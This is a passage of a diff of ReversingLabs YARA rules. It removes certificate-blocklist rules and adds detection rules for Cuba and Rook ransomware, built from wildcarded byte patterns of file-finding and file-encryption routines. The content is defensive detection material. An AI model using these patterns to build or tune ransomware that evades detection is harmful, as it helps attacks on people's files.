85 C0 74 ?? 6A ?? 6A ?? 53 53 56 FF D0 8A D8 84 + DB 75 ?? 56 E8 ?? ?? ?? ?? 59 32 C0 EB ?? 8B 4D ?? B0 ?? 89 71 ?? 5B 5E 5D C3 + } + $encrypt_files_p1 = { + 50 68 ?? ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B F8 89 7D ?? 83 + FF ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 0B 45 ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 48 ?? 8B 40 + ?? 83 C1 ?? 03 C1 8B 5D ?? 89 5D ?? 8B 4D ?? 89 4D ?? 99 03 D8 89 5D ?? 13 CA 89 4D + ?? 8B 55 ?? 8B 45 ?? 85 D2 7C ?? 7F ?? 3D ?? ?? ?? ?? 76 ?? 89 75 ?? EB ?? 83 65 ?? + ?? 85 D2 7C ?? 7F ?? 3D ?? ?? ?? ?? 76 ?? 89 75 ?? EB ?? 83 65 ?? ?? C7 45 ?? ?? ?? + ?? ?? 83 7D ?? ?? 74 ?? 6A ?? 6A ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 6A ?? 59 89 4D ?? 51 + 52 50 E8 ?? ?? ?? ?? 89 45 ?? 89 55 ?? 8B 4D ?? 6A ?? 53 51 6A ?? 6A ?? 57 FF 15 ?? + ?? ?? ?? 8B D8 89 5D ?? 85 DB 0F 84 ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? B8 ?? ?? + ?? ?? 89 45 ?? 89 45 ?? 33 C9 8B C1 89 45 ?? 89 45 ?? 89 4D ?? 89 4D ?? 89 45 ?? 89 + 45 ?? 89 4D ?? 8B 4D ?? FF 71 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? + 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 + ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 4D ?? FF 71 ?? FF 71 ?? 8D 41 ?? 50 + FF 71 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 8B 55 ?? 85 C0 + } + $encrypt_files_p2 = { + 75 ?? 89 55 ?? 21 45 ?? 8B CE 89 4D ?? 89 4D ?? EB ?? 8B 4D ?? 3B 4D ?? 0F 8D ?? ?? + ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 85 C9 74 ?? 83 7D ?? ?? 74 ?? 8D 41 ?? 3B 45 ?? 74 ?? + 8B C1 99 FF 75 ?? FF 75 ?? 52 50 E8 ?? ?? ?? ?? 8B C8 89 45 ?? C7 45 ?? ?? ?? ?? ?? + EB ?? 8B CA 81 E9 ?? ?? ?? ?? 89 4D ?? 8B 55 ?? 83 DA ?? 83 65 ?? ?? 89 55 ?? 6A ?? + 8B 45 ?? FF 70 ?? 52 51 E8 ?? ?? ?? ?? 6A ?? 8B 4D ?? FF 71 ?? 52 50 E8 ?? ?? ?? ?? + 8B C8 89 4D ?? 89 55 ?? 8B 45 ?? 2B C1 89 45 ?? 8B 4D ?? 1B CA 89 45 ?? 89 4D ?? EB + ?? 8B 55 ?? 8B C2 C1 F8 ?? FF 75 ?? FF 75 ?? 52 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? + 89 45 ?? 85 C0 75 ?? 50 FF 75 ?? FF 75 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 57 FF 15 ?? ?? + ?? ?? 8B 75 ?? 8B 7D ?? 83 4D ?? ?? E8 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 45 + ?? E8 ?? ?? ?? ?? C3 03 45 ?? 56 6A ?? 8D 4D ?? 51 50 FF 75 ?? 50 6A ?? 6A ?? 8D 85 + ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 45 ?? 40 + 89 45 ?? 3B 45 ?? 75 ?? 8B 75 ?? FF 76 ?? FF 76 ?? 8B 45 ?? 03 45 ?? 03 45 ?? 50 E8 + ?? ?? ?? ?? FF 76 ?? FF 76 ?? 8B 46 ?? 03 45 ?? 03 45 ?? 03 45 ?? 50 E8 ?? ?? ?? ?? + 83 C4 ?? 8B 7E ?? 03 7E ?? 03 7D ?? 03 7D ?? 8B 45 ?? 03 F8 8D 75 ?? A5 A5 A5 A5 6A + ?? 50 FF 15 ?? ?? ?? ?? 8B 7D ?? 33 F6 46 FF 75 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 89 4D + ?? 8B 55 ?? 8B 45 ?? E9 ?? ?? ?? ?? 53 8B 35 ?? ?? ?? ?? FF D6 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PIXELPLUS CO., LTD." and pe.signatures[i].serial=="0f:e7:df:6c:4b:9a:33:b8:3d:04:e2:3e:98:a7:7c:ce" and 1396310399<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ($create_key) and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_065569A3E261409128A40Affa90D6D10 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Cuba : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Cuba ransomware." author = "ReversingLabs" - id = "924c210b-f72a-51eb-af2a-9897faf8f677" - date = "2023-11-08" - modified = "2023-11-08" + id = "b2c81849-9fa6-58b6-b6fe-4d9a5f0923ea" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1162-L1178" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f8d68758704e41325e95ec69334aaf7fabe08a6d5557e0a81bac2f02d3ab5977" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Cuba.yara#L1-L126" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0a8dea6e38a6407897b994ea119bc8b0712a94363b7b3942dcd32c65ee5548d4" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Cuba" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Police Mutual Aid Association" and pe.signatures[i].serial=="06:55:69:a3:e2:61:40:91:28:a4:0a:ff:a9:0d:6d:10" and 1381795199<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_0979616733E062C544Df0Abd315E3B92 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "73222a8d-df63-5784-b5a2-0d936db8ddcb" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1180-L1196" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "034b233d6b6dd82ad9fa1ec99db1effa3daaa5bb478d448133c479ac728117ad" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $find_files_p1 = { + 51 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8B D7 8D 4D ?? E8 ?? + ?? ?? ?? 83 C4 ?? C6 45 ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 4D ?? E8 ?? + ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 72 ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? + 0F B7 00 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? + 0F B7 40 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45 + ?? 0F B7 40 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? 83 7D ?? ?? 8D 45 ?? 0F 43 + 45 ?? 0F B7 40 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? B0 ?? EB ?? 32 C0 84 C0 + 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B D3 C6 + 45 ?? ?? 8B C8 E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 55 ?? 83 FA ?? 0F 82 ?? ?? ?? ?? 8B 4D + ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 + ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8D 55 ?? + 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 75 ?? 8B 5D ?? 83 FB ?? 8B 7D ?? 8B 45 ?? 0F + 43 F7 83 F8 ?? 75 ?? B9 ?? ?? ?? ?? 8B D0 2B F1 66 8B 04 0E 66 3B 01 75 ?? 83 C1 ?? + 83 EA ?? 75 ?? E9 ?? ?? ?? ?? 8B 45 ?? 83 FB ?? 8D 75 ?? 0F 43 F7 83 F8 ?? 75 ?? B9 + ?? ?? ?? ?? 8B D0 2B F1 66 8B 04 0E 66 3B 01 75 ?? 83 C1 ?? 83 EA ?? 75 ?? E9 ?? ?? + ?? ?? 8B 45 ?? 83 FB ?? 8D 75 ?? 0F 43 F7 83 F8 ?? 75 ?? B9 ?? ?? ?? ?? 8B D0 2B F1 + } + $find_files_p2 = { + 66 8B 04 0E 66 3B 01 75 ?? 83 C1 ?? 83 EA ?? 75 ?? E9 ?? ?? ?? ?? 8B 45 ?? 83 FB ?? + 8D 75 ?? 0F 43 F7 83 F8 ?? 75 ?? B9 ?? ?? ?? ?? 8B D0 2B F1 66 8B 04 0E 66 3B 01 75 + ?? 83 C1 ?? 83 EA ?? 75 ?? E9 ?? ?? ?? ?? 8B 45 ?? 83 FB ?? 8D 75 ?? 0F 43 F7 83 F8 + ?? 75 ?? B9 ?? ?? ?? ?? 8B D0 2B F1 66 8B 04 0E 66 3B 01 75 ?? 83 C1 ?? 83 EA ?? 75 + ?? EB ?? 83 7D ?? ?? 75 ?? 8B 55 ?? 8D 45 ?? 8B 4D ?? 83 FA ?? 0F 43 C1 66 83 38 ?? + 75 ?? 83 FA ?? 8D 45 ?? 0F 43 C1 66 83 78 ?? ?? 75 ?? 83 FA ?? 8D 45 ?? 0F 43 C1 66 + 83 78 ?? ?? 75 ?? 83 FA ?? 8D 45 ?? 0F 43 C1 66 83 78 ?? ?? 74 ?? 8B 8D ?? ?? ?? ?? + 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 5D ?? 8B 7D ?? C6 45 ?? ?? 83 FB ?? 72 ?? 8D 0C 5D ?? + ?? ?? ?? 8B C7 81 F9 ?? ?? ?? ?? 72 ?? 8B 7F ?? 83 C1 ?? 2B C7 83 C0 ?? 83 F8 ?? 0F + 87 ?? ?? ?? ?? 51 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B BD ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B + 9D ?? ?? ?? ?? C6 45 ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B + C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? + ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 88 45 ?? 8B 55 ?? C7 45 + ?? ?? ?? ?? ?? 66 89 45 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA + ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? + ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 + } + $enum_resources = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 + 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B DA 89 5D ?? 8D 45 ?? C7 45 ?? ?? ?? + ?? ?? 50 51 6A ?? 6A ?? 6A ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 32 + C0 E9 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 89 75 ?? 85 F6 74 ?? 66 90 + FF 75 ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 56 8D 45 ?? 50 FF 75 ?? FF 15 + ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 FF 39 7D ?? 76 ?? 83 C6 ?? 83 7E ?? ?? 0F 85 + ?? ?? ?? ?? 83 3E ?? 0F 85 ?? ?? ?? ?? 8B 56 ?? 33 C0 66 89 45 ?? 8B C2 C7 45 ?? ?? + ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 58 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C3 8D 4D + ?? D1 F8 50 52 E8 ?? ?? ?? ?? 8B 5D ?? 8D 45 ?? 50 8B CB C7 45 ?? ?? ?? ?? ?? E8 ?? + ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? + 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 + E8 ?? ?? ?? ?? 83 C4 ?? F7 46 ?? ?? ?? ?? ?? 74 ?? 8D 4E ?? 8B D3 E8 ?? ?? ?? ?? 47 + 83 C6 ?? 3B 7D ?? 0F 82 ?? ?? ?? ?? 8B 75 ?? E9 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? FF + 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 94 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B + 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $encrypt_files_p1 = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 + 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 8B 7D ?? 0F 57 C0 66 0F 13 45 ?? + C7 45 ?? ?? ?? ?? ?? 8B C7 83 7F ?? ?? 72 ?? 8B 07 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? + 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 5D ?? 83 FB ?? 75 ?? FF 15 ?? ?? + ?? ?? 32 DB E9 ?? ?? ?? ?? 8D 8E ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 + ?? 8D 8E ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 8E ?? ?? ?? ?? 6A ?? 8D + 41 ?? 50 6A ?? 8D 56 ?? 51 52 89 55 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 53 FF 15 + ?? ?? ?? ?? 8B 4D ?? 8B 45 ?? 85 C9 7F ?? 7C ?? 3D ?? ?? ?? ?? 77 ?? 8D 45 ?? 8B CE + 50 E8 ?? ?? ?? ?? EB ?? 85 C9 7F ?? 7C ?? 3D ?? ?? ?? ?? 77 ?? 6A ?? EB ?? 6A ?? 8D + 45 ?? 8B CE 50 E8 ?? ?? ?? ?? 8B 75 ?? 8A D8 83 FE ?? 74 ?? 56 FF 15 ?? ?? ?? ?? 83 + CE ?? 89 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D7 8D 4D ?? E8 ?? ?? ?? ?? + 83 C4 ?? 8D 45 ?? 83 7D ?? ?? 0F 43 45 ?? 83 7F ?? ?? 72 ?? 8B 3F 50 57 FF 15 ?? ?? + ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? + 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? + 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? 83 FE ?? 74 ?? 56 FF 15 + ?? ?? ?? ?? 8A C3 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? + ?? ?? 8B E5 5D C2 ?? ?? E8 ?? ?? ?? ?? CC CC CC 55 8B EC 83 E4 ?? 81 EC + } + $encrypt_files_p2 = { + A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 8B 5D ?? 56 57 8B F9 89 5C 24 ?? 6A ?? + 8D 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 51 8B 17 8B 47 ?? 2B C2 50 52 FF 33 FF 15 ?? ?? + ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 89 43 ?? 32 C0 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 + CC E8 ?? ?? ?? ?? 8B E5 5D C2 ?? ?? 8B 44 24 ?? 8B 57 ?? 8B 0F 89 44 24 ?? 89 54 24 + ?? 89 4C 24 ?? 85 C0 7E ?? 8B D8 8B 47 ?? 8B F3 2B 47 ?? 3B D8 52 0F 43 F0 8D 47 ?? + 56 51 50 E8 ?? ?? ?? ?? 56 FF 74 24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 2B DE + 8B 54 24 ?? 03 CE 83 C4 ?? 89 4C 24 ?? 85 DB 7F ?? 8B 5C 24 ?? 6A ?? 6A ?? 0F 57 C0 + 66 0F 13 44 24 ?? FF 74 24 ?? FF 74 24 ?? FF 33 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? + 85 C0 75 ?? FF D6 89 43 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? A1 ?? + ?? ?? ?? 8D 4C 24 ?? 89 44 24 ?? 83 C4 ?? A1 ?? ?? ?? ?? 89 44 24 ?? A1 ?? ?? ?? ?? + 89 44 24 ?? 8D 87 ?? ?? ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 + ?? ?? ?? ?? 83 4C 24 ?? ?? 8D 44 24 ?? 6A ?? 50 68 ?? ?? ?? ?? 8D 44 24 ?? C7 44 24 + ?? ?? ?? ?? ?? 50 FF 33 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF D6 89 43 ?? 6A ?? 8D 44 24 + ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF 74 24 ?? FF 37 FF 33 FF 15 ?? ?? ?? ?? 85 C0 75 ?? + FF D6 89 43 ?? 32 C0 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C2 + ?? ?? 8B 8C 24 ?? ?? ?? ?? B0 ?? 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D C2 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Jessica Karam" and pe.signatures[i].serial=="09:79:61:67:33:e0:62:c5:44:df:0a:bd:31:5e:3b:92" and 1408319999<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($enum_resources) and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_7D3250B27E0547C77307030491B42802 : INFO FILE +rule REVERSINGLABS_Win64_Ransomware_Rook : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Rook ransomware." author = "ReversingLabs" - id = "54073485-e9a5-5a0b-a907-0e8a528da85d" - date = "2023-11-08" - modified = "2023-11-08" + id = "60bbfd57-18bb-58b3-9abc-ab30943bbddd" + date = "2022-01-17" + modified = "2022-01-17" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1198-L1214" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "65f036921dfb9cbce3275aefb7111711e50874440096b2e3c3b55190cfc14ddb" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win64.Ransomware.Rook.yara#L1-L122" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "dc8b37e55b634de52855dd851dbaaf3e690adfb2e875d0e0c9ef5f4846c6ff30" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Rook" + tc_detection_factor = 5 importance = 25 + strings: + $find_files = { + 48 2B D6 48 8D 4C 24 ?? 48 FF C2 41 B8 ?? ?? ?? ?? F6 D8 4D 1B FF 4C 23 FA 33 D2 E8 + ?? ?? ?? ?? 45 33 C9 89 7C 24 ?? 4C 8D 44 24 ?? 48 89 7C 24 ?? 33 D2 48 8B CE FF 15 + ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 75 ?? 4D 8B CE 45 33 C0 33 D2 48 8B CE E8 ?? ?? ?? + ?? 8B F8 48 83 FB ?? 74 ?? 48 8B CB FF 15 ?? ?? ?? ?? 8B C7 48 8B 8C 24 ?? ?? ?? ?? + 48 33 CC E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 41 5F 41 5E 5F + 5E 5D C3 49 8B 6E ?? 49 2B 2E 48 C1 FD ?? 80 7C 24 ?? ?? 75 ?? 8A 44 24 ?? 84 C0 74 + ?? 3C ?? 75 ?? 40 38 7C 24 ?? 74 ?? 4D 8B CE 48 8D 4C 24 ?? 4D 8B C7 48 8B D6 E8 ?? + ?? ?? ?? 85 C0 75 ?? 48 8D 54 24 ?? 48 8B CB FF 15 ?? ?? ?? ?? 85 C0 75 ?? 49 8B 06 + 49 8B 56 ?? 48 2B D0 48 C1 FA ?? 48 3B EA 0F 84 ?? ?? ?? ?? 48 2B D5 48 8D 0C E8 4C + 8D 0D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 + } + $encrypt_files_p1 = { + 40 55 53 56 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? F2 0F 10 05 ?? ?? ?? ?? 0F + B6 05 ?? ?? ?? ?? F2 0F 11 44 24 ?? 88 44 24 ?? E8 ?? ?? ?? ?? 33 D2 48 8D 0D ?? ?? + ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 83 CE ?? 48 8D 4C 24 ?? 89 35 ?? ?? ?? ?? + FF 15 ?? ?? ?? ?? 48 63 C8 4C 8D 4C 24 ?? 48 89 4C 24 ?? E8 ?? ?? ?? ?? 48 8D 4C 24 + ?? FF 15 ?? ?? ?? ?? 48 63 C8 4C 8D 4C 24 ?? 48 89 4C 24 ?? E8 ?? ?? ?? ?? 0F 57 C0 + 0F 57 C9 F3 0F 7F 05 ?? ?? ?? ?? F3 0F 7F 0D ?? ?? ?? ?? F3 0F 7F 05 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 48 85 C0 48 89 05 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 0F 44 0D ?? ?? ?? + ?? 48 89 0D ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF C0 48 8D 15 ?? ?? + ?? ?? 4C 63 C0 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8D 15 ?? + ?? ?? ?? 48 89 05 ?? ?? ?? ?? 33 DB 48 8B 05 ?? ?? ?? ?? 45 33 C9 48 89 05 ?? ?? ?? + ?? 45 33 C0 48 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 44 24 ?? 48 C7 + } + $encrypt_files_p2 = { + C1 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 5C 24 ?? C7 44 24 ?? ?? ?? + ?? ?? 89 5C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 + 8D 85 ?? ?? ?? ?? 4C 89 A4 24 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 44 24 ?? 4C 8D + 25 ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 45 33 C9 45 33 C0 4C 89 64 24 ?? 4C 89 BC 24 + ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 4C 8D 2D ?? ?? ?? ?? 83 + F8 ?? 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 89 5C 24 ?? + E8 ?? ?? ?? ?? 85 C0 78 ?? 4C 63 C8 4C 8D 85 ?? ?? ?? ?? 48 8D 44 24 ?? 4D 2B C1 48 + 89 44 24 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 4C 89 64 24 ?? E8 ?? ?? ?? ?? + 49 8B CD FF 15 ?? ?? ?? ?? 44 8B C0 89 05 ?? ?? ?? ?? B8 ?? ?? ?? ?? 41 F7 E8 C1 FA + ?? 8B CA C1 E9 ?? 03 D1 69 CA ?? ?? ?? ?? 44 3B C1 74 ?? FF C2 4C 8D 3D ?? ?? ?? ?? + 85 D2 0F 8E ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 49 8B DD 4C 89 B4 24 ?? ?? ?? ?? 49 + } + $encrypt_files_p3 = { + 8B FF 44 8B F2 0F 1F 00 48 8B 0D ?? ?? ?? ?? 8B 91 ?? ?? ?? ?? 85 D2 74 ?? 83 FA ?? + 75 ?? 48 89 7C 24 ?? 4C 8D 05 ?? ?? ?? ?? 48 89 5C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 C7 + 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 48 89 7C 24 ?? 4C 8D 05 ?? ?? ?? ?? 48 89 + 5C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 81 C7 ?? + ?? ?? ?? 48 81 C3 ?? ?? ?? ?? 49 83 EE ?? 75 ?? 4C 8B B4 24 ?? ?? ?? ?? 33 DB 48 8B + BC 24 ?? ?? ?? ?? 66 0F 1F 44 00 ?? 48 FF C6 41 80 3C 34 ?? 75 ?? 48 8B 8D ?? ?? ?? + ?? 48 8D 15 ?? ?? ?? ?? 89 74 24 ?? 41 B9 ?? ?? ?? ?? 45 33 C0 4C 89 64 24 ?? FF 15 + ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? C7 44 24 ?? + ?? ?? ?? ?? 45 33 C0 4C 89 7C 24 ?? FF 15 ?? ?? ?? ?? EB ?? 48 8B 8D ?? ?? ?? ?? 48 + 8D 85 ?? ?? ?? ?? 48 89 44 24 ?? 4C 8D 3D ?? ?? ?? ?? 45 33 C9 4C 89 7C 24 ?? 45 33 + C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 49 8B CC FF + 15 ?? ?? 